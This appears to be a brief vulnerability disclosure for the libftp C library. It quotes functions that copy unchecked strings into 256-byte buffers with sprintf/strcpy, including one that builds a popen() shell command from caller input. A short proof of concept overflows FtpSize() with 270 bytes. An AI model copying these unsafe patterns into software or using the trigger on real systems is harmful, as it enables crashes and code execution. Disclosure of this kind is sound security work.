http://www.netsw.org/net/ip/filetrans/ftp/libftp/ >> Description the library has a multiple (sprintf(), strcpy()) buffer overflow in various functions. >> Source errors fvuln = FtpArchie() FtpDebugDebug() FtpOpenDir() FtpSize() the FtpString is a typedef of an array with 256bytes: FtpLibrary.h: typedef char FtpString[256]; .. STATUS FtpChmod(FTP *ftp,char *file,int mode) { FtpString msg; sprintf(msg,"SITE CHMOD %03o %s",mode,file); return FtpCommand(ftp,msg,"",200,EOF); } .. int FtpArchie ( char *what, ARCHIE *result, int len) { FILE *archie; FtpString cmd,tmp; int i; bzero(result,sizeof(result[0])*len); sprintf(cmd,"archie -t -l -m %d %s",len,what); if ((archie = popen(cmd,"r"))==NULL) return 0; .. STATUS FtpDebugDebug(FTP *ftp,int n, char * Message) { FtpString tmp; strcpy(tmp,Message); if (strncmp(tmp,"PASS ",5)==0) { char *p=tmp+5; while ( *p != '\0') *p++='*'; }; .. STATUS FtpOpenDir(FTP * con,char * file) { FtpString command; if ( file == NULL || *file == '\0' ) strcpy(command,"NLST"); else sprintf(command,"NLST %s",file); return FtpCommand(con,command,"",120,150,200,EOF); } .. int FtpSize(FTP * con, char *filename) { FtpString tmp; int i,size; strcpy(tmp,"SIZE "); strcat(tmp,filename); if ( FtpSendMessage(con,tmp) == QUIT ) return EXIT(con,QUIT); .. >> POC #include <FtpLibrary.h> #define OVF_BUF (270) int main() { char *buf; buf = (char *) malloc(OVF_BUF+1); memset(buf, 'A', OVF_BUF); // insert function to init ftp connection.. // insert function to manage ftp connection.. // calling vulnerable function example FtpSize() FtpSize(NULL, buf); // insert function to close ftp connection.. return(0); } -- ~ starcadi